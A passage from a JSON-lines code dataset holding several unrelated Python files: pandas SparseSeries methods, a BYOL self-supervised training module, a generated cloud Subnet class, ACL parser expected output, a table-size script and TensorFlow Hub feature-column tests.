self._constructor(new_data, index=self.index,\n sparse_index=new_index,\n fill_value=self.fill_value).__finalize__(self)\n\n def take(self, indices, axis=0, convert=True):\n \"\"\"\n Sparse-compatible version of ndarray.take\n\n Returns\n -------\n taken : ndarray\n \"\"\"\n new_values = SparseArray.take(self.values, indices)\n new_index = self.index.take(indices)\n return self._constructor(new_values,\n index=new_index).__finalize__(self)\n\n def cumsum(self, axis=0, dtype=None, out=None):\n \"\"\"\n Cumulative sum of values. Preserves locations of NaN values\n\n Returns\n -------\n cumsum : Series or SparseSeries\n \"\"\"\n new_array = SparseArray.cumsum(self.values)\n if isinstance(new_array, SparseArray):\n return self._constructor(\n new_array, index=self.index,\n sparse_index=new_array.sp_index).__finalize__(self)\n return Series(new_array, index=self.index).__finalize__(self)\n\n def dropna(self, axis=0, inplace=False, **kwargs):\n \"\"\"\n Analogous to Series.dropna. 
If fill_value=NaN, returns a dense Series\n \"\"\"\n # TODO: make more efficient\n axis = self._get_axis_number(axis or 0)\n dense_valid = self.to_dense().valid()\n if inplace:\n raise NotImplementedError(\"Cannot perform inplace dropna\"\n \" operations on a SparseSeries\")\n if isnull(self.fill_value):\n return dense_valid\n else:\n dense_valid = dense_valid[dense_valid != self.fill_value]\n return dense_valid.to_sparse(fill_value=self.fill_value)\n\n def shift(self, periods, freq=None):\n \"\"\"\n Analogous to Series.shift\n \"\"\"\n\n # no special handling of fill values yet\n if not isnull(self.fill_value):\n # TODO: kwds is not defined...should this work?\n dense_shifted = self.to_dense().shift(periods, freq=freq, **kwds) # noqa\n return dense_shifted.to_sparse(fill_value=self.fill_value,\n kind=self.kind)\n\n if periods == 0:\n return self.copy()\n\n if freq is not None:\n return self._constructor(\n self.sp_values, sparse_index=self.sp_index,\n index=self.index.shift(periods, freq),\n fill_value=self.fill_value).__finalize__(self)\n\n int_index = self.sp_index.to_int_index()\n new_indices = int_index.indices + periods\n start, end = new_indices.searchsorted([0, int_index.length])\n\n new_indices = new_indices[start:end]\n\n new_sp_index = IntIndex(len(self), new_indices)\n if isinstance(self.sp_index, BlockIndex):\n new_sp_index = new_sp_index.to_block_index()\n\n return self._constructor(self.sp_values[start:end].copy(),\n index=self.index, sparse_index=new_sp_index,\n fill_value=self.fill_value).__finalize__(self)\n\n def combine_first(self, other):\n \"\"\"\n Combine Series values, choosing the calling Series's values\n first. Result index will be the union of the two indexes\n\n Parameters\n ----------\n other : Series\n\n Returns\n -------\n y : Series\n \"\"\"\n if isinstance(other, SparseSeries):\n other = other.to_dense()\n\n dense_combined = self.to_dense().combine_first(other)\n return dense_combined.to_sparse(fill_value=self.fill_value)\n\n def to_coo(self, row_levels=(0, ), column_levels=(1, ), sort_labels=False):\n \"\"\"\n Create a scipy.sparse.coo_matrix from a SparseSeries with MultiIndex.\n\n Use row_levels and column_levels to determine the row and column\n coordinates respectively. row_levels and column_levels are the names\n (labels) or numbers of the levels. {row_levels, column_levels} must be\n a partition of the MultiIndex level names (or numbers).\n\n .. 
versionadded:: 0.16.0\n\n Parameters\n ----------\n row_levels : tuple/list\n column_levels : tuple/list\n sort_labels : bool, default False\n Sort the row and column labels before forming the sparse matrix.\n\n Returns\n -------\n y : scipy.sparse.coo_matrix\n rows : list (row labels)\n columns : list (column labels)\n\n Examples\n --------\n >>> from numpy import nan\n >>> s = Series([3.0, nan, 1.0, 3.0, nan, nan])\n >>> s.index = MultiIndex.from_tuples([(1, 2, 'a', 0),\n (1, 2, 'a', 1),\n (1, 1, 'b', 0),\n (1, 1, 'b', 1),\n (2, 1, 'b', 0),\n (2, 1, 'b', 1)],\n names=['A', 'B', 'C', 'D'])\n >>> ss = s.to_sparse()\n >>> A, rows, columns = ss.to_coo(row_levels=['A', 'B'],\n column_levels=['C', 'D'],\n sort_labels=True)\n >>> A\n <3x4 sparse matrix of type ''\n with 3 stored elements in COOrdinate format>\n >>> A.todense()\n matrix([[ 0., 0., 1., 3.],\n [ 3., 0., 0., 0.],\n [ 0., 0., 0., 0.]])\n >>> rows\n [(1, 1), (1, 2), (2, 1)]\n >>> columns\n [('a', 0), ('a', 1), ('b', 0), ('b', 1)]\n \"\"\"\n A, rows, columns = _sparse_series_to_coo(self, row_levels,\n column_levels,\n sort_labels=sort_labels)\n return A, rows, columns\n\n @classmethod\n def from_coo(cls, A, dense_index=False):\n \"\"\"\n Create a SparseSeries from a scipy.sparse.coo_matrix.\n\n .. versionadded:: 0.16.0\n\n Parameters\n ----------\n A : scipy.sparse.coo_matrix\n dense_index : bool, default False\n If False (default), the SparseSeries index consists of only the\n coords of the non-null entries of the original coo_matrix.\n If True, the SparseSeries index consists of the full sorted\n (row, col) coordinates of the coo_matrix.\n\n Returns\n -------\n s : SparseSeries\n\n Examples\n ---------\n >>> from scipy import sparse\n >>> A = sparse.coo_matrix(([3.0, 1.0, 2.0], ([1, 0, 0], [0, 2, 3])),\n shape=(3, 4))\n >>> A\n <3x4 sparse matrix of type ''\n with 3 stored elements in COOrdinate format>\n >>> A.todense()\n matrix([[ 0., 0., 1., 2.],\n [ 3., 0., 0., 0.],\n [ 0., 0., 0., 0.]])\n >>> ss = SparseSeries.from_coo(A)\n >>> ss\n 0 2 1\n 3 2\n 1 0 3\n dtype: float64\n BlockIndex\n Block locations: array([0], dtype=int32)\n Block lengths: array([3], dtype=int32)\n \"\"\"\n return _coo_to_sparse_series(A, dense_index=dense_index)\n\n# overwrite series methods with unaccelerated versions\nops.add_special_arithmetic_methods(SparseSeries, use_numexpr=False,\n **ops.series_special_funcs)\nops.add_flex_arithmetic_methods(SparseSeries, use_numexpr=False,\n **ops.series_flex_funcs)\n# overwrite basic arithmetic to use SparseSeries version\n# force methods to overwrite previous definitions.\nops.add_special_arithmetic_methods(SparseSeries, _arith_method,\n radd_func=operator.add, comp_method=None,\n bool_method=None, use_numexpr=False,\n force=True)\n\n\n# backwards compatiblity\nclass SparseTimeSeries(SparseSeries):\n def __init__(self, *args, **kwargs):\n # deprecation TimeSeries, #10890\n warnings.warn(\"SparseTimeSeries is deprecated. Please use \"\n \"SparseSeries\", FutureWarning, stacklevel=2)\n\n super(SparseTimeSeries, self).__init__(*args, **kwargs)\n"} {"ext": "py", "sha": "1a2fca522ef32aec771028190c04f3120ce95cb1", "content": "# Copyright (c) Microsoft Corporation. 
All rights reserved.\n# Licensed under the MIT License.\n\n\"\"\"BYOL tasks.\"\"\"\n\nimport random\nfrom typing import Any, Callable, Dict, Optional, Tuple, cast\n\nimport torch\nimport torch.nn.functional as F\nfrom kornia import augmentation as K\nfrom kornia import filters\nfrom kornia.geometry import transform as KorniaTransform\nfrom pytorch_lightning.core.lightning import LightningModule\nfrom torch import Tensor, optim\nfrom torch.autograd import Variable\nfrom torch.nn.modules import BatchNorm1d, Conv2d, Linear, Module, ReLU, Sequential\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nfrom torchvision.models import resnet18\nfrom torchvision.models.resnet import resnet50\n\n# https://github.com/pytorch/pytorch/issues/60979\n# https://github.com/pytorch/pytorch/pull/61045\nModule.__module__ = \"torch.nn\"\n\n\ndef normalized_mse(x: Tensor, y: Tensor) -> Tensor:\n \"\"\"Computes the normalized mean squared error between x and y.\n\n Args:\n x: tensor x\n y: tensor y\n\n Returns:\n the normalized MSE between x and y\n \"\"\"\n x = F.normalize(x, dim=-1)\n y = F.normalize(y, dim=-1)\n mse = torch.mean(2 - 2 * (x * y).sum(dim=-1))\n return mse\n\n\n# TODO: Move this to transforms\nclass RandomApply(Module):\n \"\"\"Applies augmentation function (augm) with probability p.\"\"\"\n\n def __init__(self, augm: Callable[[Tensor], Tensor], p: float) -> None:\n \"\"\"Initialize RandomApply.\n\n Args:\n augm: augmentation function to apply\n p: probability with which the augmentation function is applied\n \"\"\"\n super().__init__()\n self.augm = augm\n self.p = p\n\n def forward(self, x: Tensor) -> Tensor:\n \"\"\"Applies an augmentation to the input with some probability.\n\n Args:\n x: a batch of imagery\n\n Returns\n augmented version of ``x`` with probability ``self.p`` else an un-augmented\n version\n \"\"\"\n return x if random.random() > self.p else self.augm(x)\n\n\n# TODO: This isn't _really_ applying the augmentations from SimCLR as we have\n# multispectral imagery and thus can't naively apply color jittering or grayscale\n# conversions. We should think more about what makes sense here.\nclass SimCLRAugmentation(Module):\n \"\"\"A module for applying SimCLR augmentations.\n\n SimCLR was one of the first papers to show the effectiveness of random data\n augmentation in self-supervised-learning setups. 
See\n https://arxiv.org/pdf/2002.05709.pdf for more details.\n \"\"\"\n\n def __init__(self, image_size: Tuple[int, int] = (256, 256)) -> None:\n \"\"\"Initialize a module for applying SimCLR augmentations.\n\n Args:\n image_size: Tuple of integers defining the image size\n \"\"\"\n super().__init__()\n self.size = image_size\n\n self.augmentation = Sequential(\n KorniaTransform.Resize(size=image_size, align_corners=False),\n # Not suitable for multispectral adapt\n # RandomApply(K.ColorJitter(0.8, 0.8, 0.8, 0.2), p=0.8),\n # K.RandomGrayscale(p=0.2),\n K.RandomHorizontalFlip(),\n RandomApply(filters.GaussianBlur2d((3, 3), (1.5, 1.5)), p=0.1),\n K.RandomResizedCrop(size=image_size),\n )\n\n def forward(self, x: Tensor) -> Tensor:\n \"\"\"Applys SimCLR augmentations to the input tensor.\n\n Args:\n x: a batch of imagery\n\n Returns:\n an augmented batch of imagery\n \"\"\"\n return cast(Tensor, self.augmentation(x))\n\n\nclass MLP(Module):\n \"\"\"MLP used in the BYOL projection head.\"\"\"\n\n def __init__(\n self, dim: int, projection_size: int = 256, hidden_size: int = 4096\n ) -> None:\n \"\"\"Initializes the MLP projection head.\n\n Args:\n dim: size of layer to project\n projection_size: size of the output layer\n hidden_size: size of the hidden layer\n \"\"\"\n super().__init__()\n self.mlp = Sequential(\n Linear(dim, hidden_size),\n BatchNorm1d(hidden_size), # type: ignore[no-untyped-call]\n ReLU(inplace=True),\n Linear(hidden_size, projection_size),\n )\n\n def forward(self, x: Tensor) -> Tensor:\n \"\"\"Forward pass of the MLP model.\n\n Args:\n x: batch of imagery\n\n Returns:\n embedded version of the input\n \"\"\"\n return cast(Tensor, self.mlp(x))\n\n\nclass EncoderWrapper(Module):\n \"\"\"Encoder wrapper for joining a model and a projection head.\n\n When we call .forward() on this module the following steps happen:\n\n * The input is passed through the base model\n * When the encoding layer is reached a hook is called\n * The output of the encoding layer is passed through the projection head\n * The forward call returns the output of the projection head\n \"\"\"\n\n def __init__(\n self,\n model: Module,\n projection_size: int = 256,\n hidden_size: int = 4096,\n layer: int = -2,\n ) -> None:\n \"\"\"Initializes EncoderWrapper.\n\n Args:\n model: model to encode\n projection_size: size of the ouput layer of the projector MLP\n hidden_size: size of hidden layer of the projector MLP\n layer: layer from model to project\n \"\"\"\n super().__init__()\n\n self.model = model\n self.projection_size = projection_size\n self.hidden_size = hidden_size\n self.layer = layer\n\n self._projector: Optional[Module] = None\n self._projector_dim: Optional[int] = None\n self._encoded = torch.empty(0)\n self._register_hook()\n\n @property\n def projector(self) -> Module:\n \"\"\"Wrapper module for the projector head.\"\"\"\n assert self._projector_dim is not None\n if self._projector is None:\n self._projector = MLP(\n self._projector_dim, self.projection_size, self.hidden_size\n )\n return self._projector\n\n def _hook(self, module: Any, input: Any, output: Tensor) -> None:\n \"\"\"Hook to record the activations at the projection layer.\n\n See the following docs page for more details on hooks:\n https://pytorch.org/docs/stable/generated/torch.nn.modules.module.register_module_forward_hook.html\n\n Args:\n module: the calling module\n input: input to the module this hook was registered to\n output: output from the module this hook was registered to\n \"\"\"\n output = 
output.flatten(start_dim=1)\n if self._projector_dim is None:\n # If we haven't already, measure the output size\n self._projector_dim = output.shape[-1]\n\n # Project the output to get encodings, the projector model is created the first\n # time this is called\n self._encoded = self.projector(output)\n\n def _register_hook(self) -> None:\n \"\"\"Register a hook for layer that we will extract features from.\"\"\"\n layer = list(self.model.children())[self.layer]\n layer.register_forward_hook(self._hook)\n\n def forward(self, x: Tensor) -> Tensor:\n \"\"\"Pass through the model, and collect the representation from our forward hook.\n\n Args:\n x: tensor of data to run through the model\n\n Returns:\n output from the model\n \"\"\"\n _ = self.model(x)\n return self._encoded\n\n\nclass BYOL(Module):\n \"\"\"BYOL implementation.\n\n BYOL contains two identical encoder networks. The first is trained as usual, and its\n weights are updated with each training batch. The second, \"target\" network, is\n updated using a running average of the first encoder's weights.\n\n See https://arxiv.org/abs/2006.07733 for more details (and please cite it if you\n use it in your own work).\n \"\"\"\n\n def __init__(\n self,\n model: Module,\n image_size: Tuple[int, int] = (256, 256),\n hidden_layer: int = -2,\n in_channels: int = 4,\n projection_size: int = 256,\n hidden_size: int = 4096,\n augment_fn: Optional[Module] = None,\n beta: float = 0.99,\n **kwargs: Any,\n ) -> None:\n \"\"\"Sets up a model for pre-training with BYOL using projection heads.\n\n Args:\n model: the model to pretrain using BYOL\n image_size: the size of the training images\n hidden_layer: the hidden layer in ``model`` to attach the projection\n head to, can be the name of the layer or index of the layer\n in_channels: number of input channels to the model\n projection_size: size of first layer of the projection MLP\n hidden_size: size of the hidden layer of the projection MLP\n augment_fn: an instance of a module that performs data augmentation\n beta: the speed at which the target encoder is updated using the main\n encoder\n \"\"\"\n super().__init__()\n\n self.augment: Module\n if augment_fn is None:\n self.augment = SimCLRAugmentation(image_size)\n else:\n self.augment = augment_fn\n\n self.beta = beta\n self.in_channels = in_channels\n self.encoder = EncoderWrapper(\n model, projection_size, hidden_size, layer=hidden_layer\n )\n self.predictor = MLP(projection_size, projection_size, hidden_size)\n self.target = EncoderWrapper(\n model, projection_size, hidden_size, layer=hidden_layer\n )\n\n # Perform a single forward pass to initialize the wrapper correctly\n self.encoder(torch.zeros(2, self.in_channels, *image_size))\n\n def forward(self, x: Tensor) -> Tensor:\n \"\"\"Forward pass of the encoder model through the MLP and prediction head.\n\n Args:\n x: tensor of data to run through the model\n\n Returns:\n output from the model\n \"\"\"\n return cast(Tensor, self.predictor(self.encoder(x)))\n\n def update_target(self) -> None:\n \"\"\"Method to update the \"target\" model weights.\"\"\"\n for p, pt in zip(self.encoder.parameters(), self.target.parameters()):\n pt.data = self.beta * pt.data + (1 - self.beta) * p.data\n\n\nclass BYOLTask(LightningModule):\n \"\"\"Class for pre-training any PyTorch model using BYOL.\"\"\"\n\n def config_task(self) -> None:\n \"\"\"Configures the task based on kwargs parameters passed to the constructor.\"\"\"\n in_channels = self.hyperparams[\"in_channels\"]\n pretrained = 
self.hyperparams[\"imagenet_pretraining\"]\n encoder = None\n\n if self.hyperparams[\"encoder_name\"] == \"resnet18\":\n encoder = resnet18(pretrained=pretrained)\n elif self.hyperparams[\"encoder_name\"] == \"resnet50\":\n encoder = resnet50(pretrained=pretrained)\n else:\n raise ValueError(\n f\"Encoder type '{self.hyperparams['encoder_name']}' is not valid.\"\n )\n\n layer = encoder.conv1\n # Creating new Conv2d layer\n new_layer = Conv2d(\n in_channels=in_channels,\n out_channels=layer.out_channels,\n kernel_size=layer.kernel_size,\n stride=layer.stride,\n padding=layer.padding,\n bias=layer.bias,\n ).requires_grad_()\n # initialize the weights from new channel with the red channel weights\n copy_weights = 0\n # Copying the weights from the old to the new layer\n new_layer.weight[:, : layer.in_channels, :, :].data[:] = Variable(\n layer.weight.clone(), requires_grad=True\n )\n # Copying the weights of the old layer to the extra channels\n for i in range(in_channels - layer.in_channels):\n channel = layer.in_channels + i\n new_layer.weight[:, channel : channel + 1, :, :].data[:] = Variable(\n layer.weight[:, copy_weights : copy_weights + 1, ::].clone(),\n requires_grad=True,\n )\n\n encoder.conv1 = new_layer\n self.model = BYOL(encoder, in_channels=in_channels, image_size=(256, 256))\n\n def __init__(self, **kwargs: Any) -> None:\n \"\"\"Initialize a LightningModule for pre-training a model with BYOL.\n\n Keyword Args:\n in_channels: number of channels on the input imagery\n encoder_name: either \"resnet18\" or \"resnet50\"\n imagenet_pretraining: bool indicating whether to use imagenet pretrained\n weights\n\n Raises:\n ValueError: if kwargs arguments are invalid\n \"\"\"\n super().__init__()\n\n # Creates `self.hparams` from kwargs\n self.save_hyperparameters() # type: ignore[operator]\n self.hyperparams = cast(Dict[str, Any], self.hparams)\n\n self.config_task()\n\n def forward(self, *args: Any, **kwargs: Any) -> Any:\n \"\"\"Forward pass of the model.\n\n Args:\n x: tensor of data to run through the model\n\n Returns:\n output from the model\n \"\"\"\n return self.model(*args, **kwargs)\n\n def configure_optimizers(self) -> Dict[str, Any]:\n \"\"\"Initialize the optimizer and learning rate scheduler.\n\n Returns:\n a \"lr dict\" according to the pytorch lightning documentation --\n https://pytorch-lightning.readthedocs.io/en/latest/common/lightning_module.html#configure-optimizers\n \"\"\"\n optimizer_class = getattr(optim, self.hyperparams.get(\"optimizer\", \"Adam\"))\n lr = self.hyperparams.get(\"lr\", 1e-4)\n weight_decay = self.hyperparams.get(\"weight_decay\", 1e-6)\n optimizer = optimizer_class(self.parameters(), lr=lr, weight_decay=weight_decay)\n\n return {\n \"optimizer\": optimizer,\n \"lr_scheduler\": {\n \"scheduler\": ReduceLROnPlateau(\n optimizer,\n patience=self.hyperparams[\"learning_rate_schedule_patience\"],\n ),\n \"monitor\": \"val_loss\",\n },\n }\n\n def training_step(self, *args: Any, **kwargs: Any) -> Tensor:\n \"\"\"Compute and return the training loss.\n\n Args:\n batch: the output of your DataLoader\n\n Returns:\n training loss\n \"\"\"\n batch = args[0]\n x = batch[\"image\"]\n with torch.no_grad():\n x1, x2 = self.model.augment(x), self.model.augment(x)\n\n pred1, pred2 = self.forward(x1), self.forward(x2)\n with torch.no_grad():\n targ1, targ2 = self.model.target(x1), self.model.target(x2)\n loss = torch.mean(normalized_mse(pred1, targ2) + normalized_mse(pred2, targ1))\n\n self.log(\"train_loss\", loss, on_step=True, on_epoch=False)\n 
self.model.update_target()\n\n return loss\n\n def validation_step(self, *args: Any, **kwargs: Any) -> None:\n \"\"\"Compute validation loss.\n\n Args:\n batch: the output of your DataLoader\n \"\"\"\n batch = args[0]\n x = batch[\"image\"]\n x1, x2 = self.model.augment(x), self.model.augment(x)\n pred1, pred2 = self.forward(x1), self.forward(x2)\n targ1, targ2 = self.model.target(x1), self.model.target(x2)\n loss = torch.mean(normalized_mse(pred1, targ2) + normalized_mse(pred2, targ1))\n\n self.log(\"val_loss\", loss, on_step=False, on_epoch=True)\n\n def test_step(self, *args: Any, **kwargs: Any) -> Any:\n \"\"\"No-op, does nothing.\"\"\"\n"} {"ext": "py", "sha": "1a2fca7df226f2bba9bf64f240edd3ed5bdefb39", "content": "# coding=utf8\n\n# Copyright 2018 JDCLOUD.COM\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# NOTE: This class is auto generated by the jdcloud code generator program.\n\n\nclass Subnet(object):\n\n def __init__(self, region=None, az=None, subnetId=None, name=None, cidr=None, vpcId=None, vpcName=None, availableIpCount=None, totalIpCount=None, networkType=None, description=None, createTime=None):\n \"\"\"\n :param region: (Optional) 地域代码, 如cn-east-1\n :param az: (Optional) 可用区, 如cn-east-1a\n :param subnetId: (Optional) 子网ID\n :param name: (Optional) 子网名称\n :param cidr: (Optional) 子网CIDR\n :param vpcId: (Optional) 私有网络Id\n :param vpcName: (Optional) 私有网络名称\n :param availableIpCount: (Optional) 可用ip数量\n :param totalIpCount: (Optional) 总ip数量\n :param networkType: (Optional) 网络类型\n :param description: (Optional) 描述\n :param createTime: (Optional) 创建时间\n \"\"\"\n\n self.region = region\n self.az = az\n self.subnetId = subnetId\n self.name = name\n self.cidr = cidr\n self.vpcId = vpcId\n self.vpcName = vpcName\n self.availableIpCount = availableIpCount\n self.totalIpCount = totalIpCount\n self.networkType = networkType\n self.description = description\n self.createTime = createTime\n"} {"ext": "py", "sha": "1a2fcb1b2b6c20c380d179e48985d1ca52ef3f7b", "content": "expected_output = {\n \"1\":{\n \"name\":\"1\",\n \"type\":\"ipv4-acl-type\",\n \"acl_type\": \"standard\",\n \"aces\":{\n \"10\":{\n \"name\":\"10\",\n \"actions\":{\n \"forwarding\":\"deny\",\n \"logging\":\"log-syslog\"\n },\n \"matches\":{\n \"l3\":{\n \"ipv4\":{\n \"protocol\":\"ipv4\",\n \"source_network\":{\n \"10.9.3.4 0.0.0.0\":{\n \"source_network\":\"10.9.3.4 0.0.0.0\"\n }\n }\n }\n }\n },\n \"statistics\":{\n \"matched_packets\":\"18\"\n }\n },\n \"20\":{\n \"name\":\"20\",\n \"actions\":{\n \"forwarding\":\"permit\"\n },\n \"matches\":{\n \"l3\":{\n \"ipv4\":{\n \"protocol\":\"ipv4\",\n \"source_network\":{\n \"any\":{\n \"source_network\":\"any\"\n }\n }\n }\n }\n },\n \"statistics\":{\n \"matched_packets\":\"58\"\n }\n }\n }\n },\n \"meraki-fqdn-dns\":{\n \"name\":\"meraki-fqdn-dns\",\n \"type\":\"ipv4-acl-type\",\n \"acl_type\": \"extended\",\n }\n}"} {"ext": "py", "sha": "1a2fcc45162161d008efc1854c54852b37f3933d", "content": "#!/usr/bin/env python\nimport sys\n\nentries = []\ntotal_size = 0;\nfor line 
in sys.stdin:\n words = line.split('\\t')\n if len(words) != 2:\n continue\n sizeStr = words[1].strip('\\n')\n if not sizeStr.isdigit():\n continue\n size = float(sizeStr)\n elem = {'table':words[0], 'size':size}\n entries.append(elem)\n total_size += size\n\nprint \"Total: %d\" % total_size\nprint \"Total: %.2f (MB)\" % (total_size / 1024 /1024)\nfor elem in entries:\n print \"%02.2f %s\" % (elem['size']/total_size*100, elem['table'])\n\n\n\n"} {"ext": "py", "sha": "1a2fcd0e841ab12011ae0ea23c66a6dcd8429797", "content": "# Copyright 2018 The TensorFlow Hub Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Tests for tensorflow_hub.feature_column.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n# pylint:disable=g-import-not-at-top,g-statement-before-imports\ntry:\n import mock as mock\nexcept ImportError:\n import unittest.mock as mock\n# pylint:disable=g-import-not-at-top,g-statement-before-imports\n\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_hub as hub\nfrom tensorflow_hub import test_utils\nfrom tensorflow_hub import tf_v1\n\n# pylint: disable=g-direct-tensorflow-import\nfrom tensorflow.python.feature_column import feature_column_v2\nfrom tensorflow.python.ops.lookup_ops import HashTable\nfrom tensorflow.python.ops.lookup_ops import KeyValueTensorInitializer\n# pylint: enable=g-direct-tensorflow-import\n\n_dense_features_module = test_utils.get_dense_features_module()\n\n\ndef text_module_fn():\n embeddings = [\n (\"\", [0, 0, 0, 0]), # OOV items are mapped to this embedding.\n (\"hello world\", [1, 2, 3, 4]),\n (\"pair-programming\", [5, 5, 5, 5]),\n ]\n keys = tf.constant([item[0] for item in embeddings], dtype=tf.string)\n indices = tf.constant(list(range(len(embeddings))), dtype=tf.int64)\n tbl_init = KeyValueTensorInitializer(keys, indices)\n table = HashTable(tbl_init, 0)\n\n weights_initializer = tf.cast(\n tf.constant(list([item[1] for item in embeddings])), tf.float32)\n\n weights = tf_v1.get_variable(\n \"weights\", dtype=tf.float32, initializer=weights_initializer)\n\n text_tensor = tf_v1.placeholder(dtype=tf.string, name=\"text\", shape=[None])\n indices_tensor = table.lookup(text_tensor)\n embedding_tensor = tf.gather(weights, indices_tensor)\n hub.add_signature(inputs=text_tensor, outputs=embedding_tensor)\n\n\ndef invalid_text_module_fn():\n text = tf_v1.placeholder(tf.string, shape=[10])\n hub.add_signature(inputs=text, outputs=tf.zeros([10, 3]))\n\n\nclass CommonColumnTest(tf.test.TestCase):\n\n def setUp(self):\n self.spec = hub.create_module_spec(text_module_fn)\n\n @mock.patch.object(feature_column_v2._StateManagerImpl, \"add_resource\")\n def testFeatureColumnsWithResources(self, mock_add_resource):\n feature_column = hub.text_embedding_column(\"text_a\", self.spec)\n if not isinstance(feature_column, feature_column_v2.FeatureColumn):\n 
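# Resource tracking only exists for feature column v2 instances, so the test is skipped otherwise.\n      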
self.skipTest(\"Resources not implemented in the state manager of feature \"\n \"column v2.\")\n self.assertTrue(feature_column_v2.is_feature_column_v2([feature_column]))\n\n @mock.patch.object(feature_column_v2._StateManagerImpl, \"add_resource\")\n def testFeatureColumnsWithNoResources(self, mock_add_resource):\n mock_add_resource.side_effect = NotImplementedError\n feature_column = hub.text_embedding_column(\"text_a\", self.spec)\n self.assertFalse(feature_column_v2.is_feature_column_v2([feature_column]))\n\n\nclass TextEmbeddingColumnTest(tf.test.TestCase):\n\n def setUp(self):\n self.spec = hub.create_module_spec(text_module_fn)\n\n def testVariableShape(self):\n text_column = hub.text_embedding_column(\"text\", self.spec, trainable=False)\n self.assertEqual(text_column._variable_shape, [4])\n\n def testParents(self):\n text_column = hub.text_embedding_column(\"text\", self.spec, trainable=False)\n self.assertEqual([\"text\"], text_column.parents)\n\n def testMakeParseExampleSpec(self):\n text_column = hub.text_embedding_column(\"text\", self.spec, trainable=False)\n parsing_spec = tf_v1.feature_column.make_parse_example_spec([text_column])\n self.assertEqual(parsing_spec,\n {\"text\": tf_v1.FixedLenFeature([1], dtype=tf.string)})\n\n def testInputLayer(self):\n features = {\n \"text_a\": [\"hello world\", \"pair-programming\"],\n \"text_b\": [\"hello world\", \"oov token\"],\n }\n feature_columns = [\n hub.text_embedding_column(\"text_a\", self.spec, trainable=False),\n hub.text_embedding_column(\"text_b\", self.spec, trainable=False),\n ]\n with tf.Graph().as_default():\n input_layer = tf_v1.feature_column.input_layer(features, feature_columns)\n with tf_v1.train.MonitoredSession() as sess:\n output = sess.run(input_layer)\n self.assertAllEqual(\n output, [[1, 2, 3, 4, 1, 2, 3, 4], [5, 5, 5, 5, 0, 0, 0, 0]])\n\n def testDenseFeatures(self):\n features = {\n \"text_a\": [\"hello world\", \"pair-programming\"],\n \"text_b\": [\"hello world\", \"oov token\"],\n }\n feature_columns = [\n hub.text_embedding_column(\"text_a\", self.spec, trainable=False),\n hub.text_embedding_column(\"text_b\", self.spec, trainable=False),\n ]\n if not feature_column_v2.is_feature_column_v2(feature_columns):\n self.skipTest(\"Resources not implemented in the state manager of feature \"\n \"column v2.\")\n with tf.Graph().as_default():\n feature_layer = _dense_features_module.DenseFeatures(feature_columns)\n feature_layer_out = feature_layer(features)\n with tf_v1.train.MonitoredSession() as sess:\n output = sess.run(feature_layer_out)\n self.assertAllEqual(\n output, [[1, 2, 3, 4, 1, 2, 3, 4], [5, 5, 5, 5, 0, 0, 0, 0]])\n\n def testDenseFeatures_shareAcrossApplication(self):\n features = {\n \"text\": [\"hello world\", \"pair-programming\"],\n }\n feature_columns = [\n hub.text_embedding_column(\"text\", self.spec, trainable=True),\n ]\n if not feature_column_v2.is_feature_column_v2(feature_columns):\n self.skipTest(\"Resources not implemented in the state manager of feature \"\n \"column v2.\")\n with tf.Graph().as_default():\n feature_layer = _dense_features_module.DenseFeatures(feature_columns)\n feature_layer_out_1 = feature_layer(features)\n feature_layer_out_2 = feature_layer(features)\n\n # We define loss only on the first layer. 
Since layers should have shared\n # weights, we expect the second layer will change too.\n loss = feature_layer_out_1 - tf.constant(0.005)\n optimizer = tf_v1.train.GradientDescentOptimizer(learning_rate=0.7)\n train_op = optimizer.minimize(loss)\n\n with tf_v1.train.MonitoredSession() as sess:\n before_update_1 = sess.run(feature_layer_out_1)\n sess.run(train_op)\n after_update_1 = sess.run(feature_layer_out_1)\n after_update_2 = sess.run(feature_layer_out_2)\n\n self.assertAllEqual(before_update_1, [[1, 2, 3, 4],\n [5, 5, 5, 5]])\n self.assertAllEqual(after_update_1, after_update_2)\n\n def testWorksWithCannedEstimator(self):\n comment_embedding_column = hub.text_embedding_column(\n \"comment\", self.spec, trainable=False)\n upvotes = tf_v1.feature_column.numeric_column(\"upvotes\")\n\n feature_columns = [comment_embedding_column, upvotes]\n estimator = tf_v1.estimator.DNNClassifier(\n hidden_units=[10],\n feature_columns=feature_columns,\n model_dir=self.get_temp_dir())\n\n # This only tests that estimator apis are working with the feature\n # column without throwing exceptions.\n features = {\n \"comment\": np.array([\n [\"the quick brown fox\"],\n [\"spam spam spam\"],\n ]),\n \"upvotes\": np.array([\n [20],\n [1],\n ]),\n }\n labels = np.array([[1], [0]])\n if hasattr(tf.compat, \"v1\"):\n numpy_input_fn = tf.compat.v1.estimator.inputs.numpy_input_fn\n else:\n numpy_input_fn = tf_v1.estimator.inputs.numpy_input_fn\n input_fn = numpy_input_fn(features, labels, shuffle=True)\n estimator.train(input_fn, max_steps=1)\n estimator.evaluate(input_fn, steps=1)\n estimator.predict(input_fn)\n\n def testTrainableEmbeddingColumn(self):\n feature_columns = [\n hub.text_embedding_column(\"text\", self.spec, trainable=True),\n ]\n\n with tf.Graph().as_default():\n features = {\n \"text\": [\"hello world\", \"pair-programming\"],\n }\n target = [[1, 1, 1, 1], [4, 3, 2, 1]]\n input_layer = tf_v1.feature_column.input_layer(features, feature_columns)\n\n loss = tf.cast(\n tf_v1.losses.mean_squared_error(input_layer, target), tf.float64)\n optimizer = tf_v1.train.GradientDescentOptimizer(learning_rate=0.97)\n train_op = optimizer.minimize(loss)\n\n with 